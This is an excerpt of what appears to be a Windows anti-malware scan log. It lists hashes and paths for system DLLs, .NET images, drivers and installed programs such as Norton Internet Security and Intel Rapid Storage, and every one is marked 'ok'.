12:17:20.0976 0x1aa8 C:\Windows\SysWOW64\devenum.dll - ok
12:17:20.0979 0x1aa8 [ 7069AAB8536F29ED7323140973A2894B, 04B7FB6C64BFA3B80549F35CEF36D5DAE5D19A40E42444B3665B6BEFDF98EB5F ] C:\Windows\SysWOW64\msdmo.dll
12:17:20.0979 0x1aa8 C:\Windows\SysWOW64\msdmo.dll - ok
12:17:20.0983 0x1aa8 [ E24FE90E9DE8D8AE70E59F7B01675DEF, DDB0691488DB424CC203505E27364B24E4410E599A972CF2C1AFF4E2F3E3C04F ] C:\Windows\SysWOW64\avicap32.dll
12:17:20.0983 0x1aa8 C:\Windows\SysWOW64\avicap32.dll - ok
12:17:20.0986 0x1aa8 [ C335EC1182AC10B188705554E0BC1186, 963CD11CEF7A79559361134FDF9C07B8EA829A40D3996D77E95C291DD17AAD2B ] C:\Windows\SysWOW64\msvfw32.dll
12:17:20.0987 0x1aa8 C:\Windows\SysWOW64\msvfw32.dll - ok
12:17:20.0991 0x1aa8 [ 75F5E1FE8D55CF8E577E0EC5F2290D3F, F4E2C81F0834018052A481AE8D7DF4780302A6844160CCDC09F7D82D3B992BDE ] C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_ec80f00e8593ece5\comctl32.dll
12:17:20.0991 0x1aa8 C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18201_none_ec80f00e8593ece5\comctl32.dll - ok
12:17:20.0995 0x1aa8 [ 24498D084FAA7A459C91066EC241E1CE, 5214A26D8B441F7A55414DC2935AF6C76DB8C8D55F8677DA97D19943C69D765E ] C:\Windows\SysWOW64\vfwwdm32.dll
12:17:20.0995 0x1aa8 C:\Windows\SysWOW64\vfwwdm32.dll - ok
12:17:20.0998 0x1aa8 [ 95828D670CFD3B16EE188168E083C3C5, 8C10AE4BE93834A4C744F27CA79736D9123ED9B0D180DB28556D2D002545BAF2 ] C:\Windows\System32\mshta.exe
12:17:20.0998 0x1aa8 C:\Windows\System32\mshta.exe - ok
12:17:21.0002 0x1aa8 [ 797E2E5C309AFF76990D5B7AF457EACA, 24D76D57D2500829429588385C7613771E7AD5D3EE864740E38FD4BBD87DD42F ] C:\Windows\System32\mshtml.dll
12:17:21.0002 0x1aa8 C:\Windows\System32\mshtml.dll - ok
12:17:21.0006 0x1aa8 [ FB4045578F5180BDB1963AB352B78548, 8E645A63436EE6CDDB78E6064AEB04ECE39208F760A3EF13A3F49FDF41505E21 ] C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
12:17:21.0006 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll - ok
12:17:21.0009 0x1aa8 [ 81CC0C058106D66AC2447F733A0E5C00, 09704237396CB968FC5F9AA594C29E1AEE3870090F7174ED03CDEC4E0BC8E683 ] C:\Program Files\Internet Explorer\sqmapi.dll
12:17:21.0010 0x1aa8 C:\Program Files\Internet Explorer\sqmapi.dll - ok
12:17:21.0013 0x1aa8 [ A14BB2F5F6457738AAA11367F5172A05, 45E47BA26B9998EE145BA0D9C50592BC4C7C25861D04ABB57B6D222FCD89FA99 ] C:\Windows\System32\ieframe.dll
12:17:21.0013 0x1aa8 C:\Windows\System32\ieframe.dll - ok
12:17:21.0017 0x1aa8 [ 9108540E866F75C7AF2B91DD921A8091, 7208C8E05E818781D7F2703B86848FC90651E0D8BE10362863250F2283CEC511 ] C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll
12:17:21.0017 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll - ok
12:17:21.0020 0x1aa8 [ B3CE0951E3C1EA3C733573C472EE85F9, F7D81435BA1B85A6B105480B8BF484255CB74B2E31CEA927D8F3546DB6549293 ] C:\Windows\System32\msimtf.dll
12:17:21.0020 0x1aa8 C:\Windows\System32\msimtf.dll - ok
12:17:21.0024 0x1aa8 [ 2EBD0C5B090125AECF017C57344C45AB, 4FF8F2460115C60AD164EE0DC2079E1601B8AA21A1BA8033B7B731FAF85411B6 ] C:\Windows\System32\msls31.dll
12:17:21.0024 0x1aa8 C:\Windows\System32\msls31.dll - ok
12:17:21.0028 0x1aa8 [ C676E5EA388AF7C4C031F56F9B42E362, 7686AF56DF7D8A333C7F741DEA06D0577E88B69F648CEC94C1D6BEFAAE6B4135 ] C:\Windows\System32\d2d1.dll
12:17:21.0028 0x1aa8 C:\Windows\System32\d2d1.dll - ok
12:17:21.0031 0x1aa8 [ DD85F00EC31F77315AE992B7B0411D65, 54C7A699252AAC3210BD1B8047292F5BE004FA72B8B5338D9772EF800C7EAED0 ] C:\Windows\System32\DWrite.dll
12:17:21.0032 0x1aa8 C:\Windows\System32\DWrite.dll - ok
12:17:21.0035 0x1aa8 [ E8710B5DDA963E6BA198DF5FB209E72A, 87C8E2467C42BB4AAF53481DD3D27D4B3E06A738630DDA140AC359F0839B907F ] C:\Windows\System32\d3d10warp.dll
12:17:21.0035 0x1aa8 C:\Windows\System32\d3d10warp.dll - ok
12:17:21.0039 0x1aa8 [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
12:17:21.0039 0x1aa8 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe - ok
12:17:21.0043 0x1aa8 [ 0DCA5F8AF83975061D9D8340DC471B5C, 71C8549419F46ABB4826B1847BF325374FA5C237CE14DB8B1DD8BB6FDABF6138 ] C:\Windows\SysWOW64\msvcr110_clr0400.dll
12:17:21.0043 0x1aa8 C:\Windows\SysWOW64\msvcr110_clr0400.dll - ok
12:17:21.0047 0x1aa8 [ D83947A58613E9091B4C9CC0F1546A8D, C71DF6E18E2099FC462717B8658D39C607A62C7E7A1E5CD0E258C17434535AD0 ] C:\Windows\SysWOW64\mscoree.dll
12:17:21.0047 0x1aa8 C:\Windows\SysWOW64\mscoree.dll - ok
12:17:21.0051 0x1aa8 [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
12:17:21.0051 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe - ok
12:17:21.0054 0x1aa8 [ 81FB155132AE12BA18119D5B36A85476, B135C87752B20C98CD5D4B9BE47316F785EC41FD5E391D8609F06EDA29B05BBF ] C:\Windows\System32\msvcr110_clr0400.dll
12:17:21.0054 0x1aa8 C:\Windows\System32\msvcr110_clr0400.dll - ok
12:17:21.0058 0x1aa8 [ 22767104BD9E5ED023457BF9CB374297, 52228F690197D4EF6ED4433AA88F798D08BF6B0AA85C5ABF2741754089F6E792 ] C:\Program Files (x86)\Google\Update\1.3.24.7\goopdateres_en.dll
12:17:21.0058 0x1aa8 C:\Program Files (x86)\Google\Update\1.3.24.7\goopdateres_en.dll - ok
12:17:21.0062 0x1aa8 [ BB1FC298BE53AAB1E110F6E786BD8AC5, C2DA2C3CE96D5F8B50013063B5EF7BED7478636896C709A7AF34855B2E69B9F1 ] C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
12:17:21.0062 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe - ok
12:17:21.0066 0x1aa8 [ 3F2C5D443777650ACD8FE56AC1E34D25, 72634D336FFAC8A0E6D827F2DAE920FC33E75BD990301DD705039822D1E2495B ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.ServiceProce#\7934f9795ad87e109e4df93b3a5cdf06\System.ServiceProcess.ni.dll
12:17:21.0066 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.ServiceProce#\7934f9795ad87e109e4df93b3a5cdf06\System.ServiceProcess.ni.dll - ok
12:17:21.0070 0x1aa8 [ A60191DB34FBCB0349F993108348F300, 7F3E712166987EF12CB371A78738292AA0F1A3D5885B8684058A197A90798776 ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Remo#\f43786f775f5d2d95de9710ea55786ed\System.Runtime.Remoting.ni.dll
12:17:21.0070 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Remo#\f43786f775f5d2d95de9710ea55786ed\System.Runtime.Remoting.ni.dll - ok
12:17:21.0075 0x1aa8 [ B1CC71046A714E6A6AF0A09EB7E05299, 75AC58DC7EE7391F6EB6AC93FF6AF510674D5C1BB6ABFE03AF0A524071554910 ] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
12:17:21.0075 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe - ok
12:17:21.0079 0x1aa8 [ 5E3C0E5FFDA48C5DA35BBFB8EFFF8066, E2BBCC111DB1CE6072CB796F21677E4529029CE66DDC471EC793278F81F1FCF6 ] C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
12:17:21.0079 0x1aa8 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll - ok
12:17:21.0083 0x1aa8 [ CE38536E05E23FE796C11AFFAB6FA842, C513ECE5B70D433C7D97009307C3CCFDD0E5ED77423AD57319EC8390DAEFD0BC ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
12:17:21.0083 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll - ok
12:17:21.0087 0x1aa8 [ 93C2D166F5C3C14B32B15184254049C3, 397879F4974CD03FBEE3DC3EA859F1BE3B9E3269603F053CE17DCBC384B83B34 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll
12:17:21.0087 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll - ok
12:17:21.0091 0x1aa8 [ 0F42F3605AB5C3679765FF1081275EF3, 50BD23EC2590C1083EA33E3D1E3448244A3D8995672DFB4DBC409E20FA9BF2FF ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System\b3a78269847005365001c33870cd121f\System.ni.dll
12:17:21.0091 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\System\b3a78269847005365001c33870cd121f\System.ni.dll - ok
12:17:21.0095 0x1aa8 [ D54255492CDA547C71791F96500444DB, 025741038F1D181A451AEDD152ED2F4A0B6EE206EF1E3E4958B0C1BA118AF5D8 ] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorUtil.dll
12:17:21.0095 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorUtil.dll - ok
12:17:21.0099 0x1aa8 [ 2CC8BA043BEDCCD2AD51F37078FF7DC9, 71087722B7BA6C58E0A3BFB74F7D68E3D1B7610B918C1CB506471B901A1F620D ] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgr.dll
12:17:21.0099 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgr.dll - ok
12:17:21.0103 0x1aa8 [ 0605F44F32F24B362EEC5331AAE3E61F, 397C8E3A944D30F9FDA82136D5F8A1C06A2A9D067501A721DD910B546C490433 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgrSvc\cbc32f4e9cbddec98a4a8b9b6c16bce3\IAStorDataMgrSvc.ni.exe
12:17:21.0103 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgrSvc\cbc32f4e9cbddec98a4a8b9b6c16bce3\IAStorDataMgrSvc.ni.exe - ok
12:17:21.0108 0x1aa8 [ C7928C9283C7D39D601926DC28736441, 32782CC8DCCBBFC0A166485B2B7ECAC4DF827206550B828A121C37B0E84E9DEB ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.ServiceProce#\b34b348a9935338b1282fd0c9309eb1f\System.ServiceProcess.ni.dll
12:17:21.0108 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\System.ServiceProce#\b34b348a9935338b1282fd0c9309eb1f\System.ServiceProcess.ni.dll - ok
12:17:21.0112 0x1aa8 [ 8449FC50E2FF0A3EFCA438AA7EEE0ED4, 3C22881A2A716DEE48A0A75C9ED84DCE3610C47CA42C8DED299BBF4D95C9B73A ] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorCommon.dll
12:17:21.0112 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorCommon.dll - ok
12:17:21.0116 0x1aa8 [ CAAD55DD94E3F0EDB522F4FF3BD0A4C3, 91FDB462104B52FE0A682BA54B687F156D8E5E86EA24B5E2F70A2573FD07BCE4 ] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
12:17:21.0116 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll - ok
12:17:21.0119 0x1aa8 [ 83F19879E009EA236FED44AAACBE3AC5, 12ACD9E3EB00A894BEC5997D27DAAFE412ACD769B95BC6C24216BD0CD713AE9A ] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgr\b24de2b2c81394a861633df3b7f930ea\IAStorDataMgr.ni.dll
12:17:21.0119 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgr\b24de2b2c81394a861633df3b7f930ea\IAStorDataMgr.ni.dll - ok
12:17:21.0123 0x1aa8 [ 7F9E9D016AC31E828503884B0FFC409A, 6F256D4A3F4DF1E77686A7C599EFA71CE738342EC877FFF82D319278F8C2D936 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\2ee6072b085107c93c989e5598f35800\IAStorUtil.ni.dll
12:17:21.0123 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\2ee6072b085107c93c989e5598f35800\IAStorUtil.ni.dll - ok
12:17:21.0126 0x1aa8 [ 0EF6ADCF0AEC1EB8B758A72FBA757A95, D374559A2F0CA85AD5CC2562A4EA9F2FAF7B29185E817E8AF0B671B7D0939D3B ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\5b6ddf934128d538cd5cd77bf4209b93\System.Configuration.ni.dll
12:17:21.0126 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\5b6ddf934128d538cd5cd77bf4209b93\System.Configuration.ni.dll - ok
12:17:21.0131 0x1aa8 [ 3D232BA8915FEA0694B07E535FC8D03A, 7995028113425BC802A77F5529D49E9EBC3012117585AE079F694D969AA05EEF ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\217ece46920546d718414291d463bb1c\System.Xml.ni.dll
12:17:21.0131 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\217ece46920546d718414291d463bb1c\System.Xml.ni.dll - ok
12:17:21.0135 0x1aa8 [ 44CB59BDC8576B78CC79C927CDEE215A, BEE1E8B6A3A27326D3C2B87C947FBCB9C0E211341D938E0511308EA238B41915 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\98c91b8d3f1d54c41ada5f37e0935303\System.Runtime.Remoting.ni.dll
12:17:21.0135 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\98c91b8d3f1d54c41ada5f37e0935303\System.Runtime.Remoting.ni.dll - ok
12:17:21.0139 0x1aa8 [ B7B3C17C8244AC3E90557295812358FF, 3736BBF910328B168E87B4BD127A985134089BE07F0D16C2F94A94B01A3A0F16 ] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\ISDI.dll
12:17:21.0139 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\ISDI.dll - ok
12:17:21.0143 0x1aa8 [ BE08FB2B4041E0FB8258EA0223E0B7C1, 0516DC841A8A36DF2832D49938D72629BF8CDD08FF37F1B430C5C1B451B6A8CD ] C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\db0cab2acf56035b3c1dfbb0a78a7dc7\IsdiInterop.ni.dll
12:17:21.0143 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\db0cab2acf56035b3c1dfbb0a78a7dc7\IsdiInterop.ni.dll - ok
12:17:21.0147 0x1aa8 [ D3090576412EC63E0C6271D8B0974D73, 0E7EB7818FE248DCA5FE6CDFBD540A862B39E0A88609141FB3D7D1F82E0521D6 ] C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
12:17:21.0148 0x1aa8 C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe - ok
12:17:21.0151 0x1aa8 [ D34A527493F39AF4491B3E909DC697CA, 7A74DA389FBD10A710C294C2E914DC6F18E05F028F07958A2FA53AC44F0E4B90 ] C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcm90.dll
12:17:21.0151 0x1aa8 C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcm90.dll - ok
12:17:21.0155 0x1aa8 [ A0617B5753E31126AD29C03154F4F329, 3BC10C0A54D1D60B0C670D901944D3F115E2EBB406C989409145E7151AA55EFE ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
12:17:21.0155 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll - ok
12:17:21.0159 0x1aa8 [ 09A116FB06C5E362EF8938D29CDAB27B, 887B39388C39FF262FBBE3047FA1F5F47EB649AF3D760865AFE614DE64160D33 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
12:17:21.0159 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll - ok
12:17:21.0163 0x1aa8 [ 8CC33F757E817C7C03C6A5F7FDF85F09, C120CA09A37CAD9DD39B59B9C99476B38E666B32A907D68495F9E568DA5CE694 ] C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\1d696b2d3de530f7ee971070263667ff\WindowsBase.ni.dll
12:17:21.0163 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\1d696b2d3de530f7ee971070263667ff\WindowsBase.ni.dll - ok
12:17:21.0168 0x1aa8 [ DC296BD3326B95CFAED8ED972394AE7A, E13B8F85CD085150DB5F2864BACB3B8A88E7322BB279584D7AFED718C16C51D5 ] C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RsCRLib.dll
12:17:21.0168 0x1aa8 C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RsCRLib.dll - ok
12:17:21.0171 0x1aa8 [ 386FC27B5A07BFFD387CE0581BA8C061, D690CFDCF5915EFDEE8684ED235E00E73C6B7EC9744093B9AD31362F34CE3B20 ] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
12:17:21.0172 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe - ok
12:17:21.0176 0x1aa8 [ 53267B190C07F54DD916BD8ABAB85DD6, 4153849EA2612B36055B4886086473DB2FC63463A2355CF076DD125899A5BEFA ] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorCommon\98789ceac45864f18d5c03b756259d1d\IAStorCommon.ni.dll
12:17:21.0176 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorCommon\98789ceac45864f18d5c03b756259d1d\IAStorCommon.ni.dll - ok
12:17:21.0180 0x1aa8 [ 3D7D2E825C63FF501E896CF008C70D75, 037FC52B8FC6089338EB456F2B45638ED36C42A4DCA7ACE391D166B2329838A1 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
12:17:21.0180 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe - ok
12:17:21.0184 0x1aa8 [ C1B5307377C98F87E0152C44E9FF8DEE, E4B8CACDD50A9A6457708E3D15DDFA3CF23B444582FD37BA50444B53802FF0C7 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cscomp.dll
12:17:21.0184 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\cscomp.dll - ok
12:17:21.0188 0x1aa8 [ 24FCC3CDAE327F632CB8696E1E40F772, 1EA38207DE7DCBB6199708E5043A7D2DB290933BF963910206E2576566442003 ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\alink.dll
12:17:21.0188 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\alink.dll - ok
12:17:21.0191 0x1aa8 [ E955300DF949977878C705EC8681009A, 8DF0532317D5A00DF1A1CED769D1944EA5C29FED35C1038C5C9E5486EDA6CCBC ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorpe.dll
12:17:21.0191 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorpe.dll - ok
12:17:21.0196 0x1aa8 [ ED797D8DC2C92401985D162E42FFA450, B746362010A101CB5931BC066F0F4D3FC740C02A68C1F37FC3C8E6C87FD7CB1E ] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
12:17:21.0196 0x1aa8 C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe - ok
12:17:21.0199 0x1aa8 [ 539C49CEBB3C50957AC8A09D95ECD880, 49E75CDB556FBCE72C44648F8930CF2209C1360F9311C5B4CEB19E13B11E6B75 ] C:\Windows\SysWOW64\shfolder.dll
12:17:21.0200 0x1aa8 C:\Windows\SysWOW64\shfolder.dll - ok
12:17:21.0203 0x1aa8 [ 1305F77D8B17AA4C516263D6F8013836, B45EE4A72C5C93068DF7DEBC3C914C613556D4642E84A34630535E840AA77998 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
12:17:21.0203 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe - ok
12:17:21.0207 0x1aa8 [ BC83108B18756547013ED443B8CDB31B, B2AD109C15EAA92079582787B7772BA0A2F034F7D075907FF87028DF0EAEA671 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\msvcp100.dll
12:17:21.0207 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\msvcp100.dll - ok
12:17:21.0212 0x1aa8 [ 0E37FBFA79D349D672456923EC5FBBE3, 8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\msvcr100.dll
12:17:21.0212 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\msvcr100.dll - ok
12:17:21.0216 0x1aa8 [ 159CDD94AEFC2C5B55670D06D69161D9, 2E573F32FE9F4545EF1621D5A0AF6A6B951638D4D9766C1EDA9732DA93FE6009 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccl120u.dll
12:17:21.0217 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccl120u.dll - ok
12:17:21.0220 0x1aa8 [ DE61E7025B535CBC1BCD4DD66232BF1E, 54E2D0770BD75089A1159A97F7E4F667940C0D0FD3518CF2211F047C5C634B7C ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccvrtrst.dll
12:17:21.0220 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccvrtrst.dll - ok
12:17:21.0224 0x1aa8 [ 79721F4ED3C3B61D5DEBCE2A4EF831B9, D6963A67F0644B5E90D441879A0B7897A1B71FA1FC153AC506C85ECFDE22C872 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\efacli.dll
12:17:21.0224 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\efacli.dll - ok
12:17:21.0228 0x1aa8 [ 4C3F95DA11EA5B27E8223813D8711692, 927ECDF5B50F0C0CB619BE2D69E1D6BD35C0E9DB4A893E5F038E851B1F1FDF2A ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccsvc.dll
12:17:21.0228 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccsvc.dll - ok
12:17:21.0233 0x1aa8 [ 6576E4B1F44316E34F811464CCE605F6, 29E82BF64EFE026F45428FD6E84A736797CFEAA7FB16F7647D6A574C91979DB2 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\srtsp32.dll
12:17:21.0233 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\srtsp32.dll - ok
12:17:21.0237 0x1aa8 [ CA4CBDC3CB55A5EA23F1ACFE3A25AFCA, EB0CD35B8F71818FCB041F0B73F4578A3FDE619FA37D98C8BB0B95CD564FD959 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccipc.dll
12:17:21.0237 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccipc.dll - ok
12:17:21.0240 0x1aa8 [ 176CCC837309E1CA56CBADA5304C33D6, A7B5D6954B85695D4E7883A5FFF53B522D4A95EAE84B31EAE4884666064854D3 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\dimaster.dll
12:17:21.0240 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\dimaster.dll - ok
12:17:21.0245 0x1aa8 [ F04479CCC8B47C860F784B3FFA56C4CC, 600E3899EDDE7E3FB0E818233866CC0553AB7D539332D950084D66CD140311B0 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccset.dll
12:17:21.0245 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccset.dll - ok
12:17:21.0249 0x1aa8 [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] C:\Windows\System32\sppsvc.exe
12:17:21.0249 0x1aa8 C:\Windows\System32\sppsvc.exe - ok
12:17:21.0253 0x1aa8 [ 5C9EE2303CA7F267665D75237862B39C, 5DECD977A823C14B4D980D3DB621BC875231B741653F0450A027FC9E87725F9D ] C:\Windows\System32\drivers\NISx64\1503000.00C\symds64.sys
12:17:21.0254 0x1aa8 C:\Windows\System32\drivers\NISx64\1503000.00C\symds64.sys - ok
12:17:21.0258 0x1aa8 [ 0510396A957E9FD7205BA62D3CAE4528, C80C39EB3A87C5111132E96E966CF74ACABA36DE7714B545A707027D35995792 ] C:\Windows\System32\drivers\NISx64\1503000.00C\ccsetx64.sys
12:17:21.0258 0x1aa8 C:\Windows\System32\drivers\NISx64\1503000.00C\ccsetx64.sys - ok
12:17:21.0262 0x1aa8 [ 9F31630D7FC2DD9D5DA1CE359AAD1F46, 296D29EDF53956D1899DE4669AB429C280DF9F183F00AE1CE528E7C575802235 ] C:\Windows\System32\drivers\NISx64\1503000.00C\symefa64.sys
12:17:21.0262 0x1aa8 C:\Windows\System32\drivers\NISx64\1503000.00C\symefa64.sys - ok
12:17:21.0267 0x1aa8 [ FFF95479C7AB1550F0750A5D01744211, FF67F892AABCE1C2B695FF4C0816339566F5745C1498D48FAC050E5196C1CE09 ] C:\Windows\System32\drivers\spsys.sys
12:17:21.0267 0x1aa8 C:\Windows\System32\drivers\spsys.sys - ok
12:17:21.0271 0x1aa8 [ F6F8CDA3CC5207BFD0B319A26E33ACD3, 6630DEE80A85DA972D3734A5D67E274AEE7042A73AB45E19E15DC989AE88459E ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IDSviA64.sys
12:17:21.0271 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IDSviA64.sys - ok
12:17:21.0275 0x1aa8 [ 97E11C50CE52277B377396EA8838E539, E17D03F80E14F961C41F2D54D1EF73D29BF01F38459C5710D786234F8BA3C835 ] C:\Windows\System32\drivers\SYMEVENT64x86.SYS
12:17:21.0275 0x1aa8 C:\Windows\System32\drivers\SYMEVENT64x86.SYS - ok
12:17:21.0279 0x1aa8 [ A9F3BFC9345F49614D5859EC95B9E994, 306467D280E99D0616E839278A4DB5BED684F002AE284C3678CABB5251459CB3 ] C:\Program Files\Windows Media Player\wmpnetwk.exe
12:17:21.0279 0x1aa8 C:\Program Files\Windows Media Player\wmpnetwk.exe - ok
12:17:21.0283 0x1aa8 [ E36112A8A6C7F840169A7E92C12F4203, 52795B2E6ECCE751EEF5074AF52FDE376A382D0A1C43B90DD4F77A397C00FBC5 ] C:\Windows\System32\wsock32.dll
12:17:21.0283 0x1aa8 C:\Windows\System32\wsock32.dll - ok
12:17:21.0287 0x1aa8 [ B18CE01B9C09C59422BA7C7064248B35, B355EE2FBB37C4B0EFFE4DC5E0788A26579266828E7988EDC497B0AE7375F8AB ] C:\Windows\System32\drivers\NISx64\1503000.00C\srtspx64.sys
12:17:21.0287 0x1aa8 C:\Windows\System32\drivers\NISx64\1503000.00C\srtspx64.sys - ok
12:17:21.0290 0x1aa8 [ 423982DD851406A52B6399DDB196C606, 5FFBA6D1E9398E7C5D18553EE1C485F59174013622332F7BD8D461F707F1EC93 ] C:\Windows\System32\wmdrmdev.dll
12:17:21.0290 0x1aa8 C:\Windows\System32\wmdrmdev.dll - ok
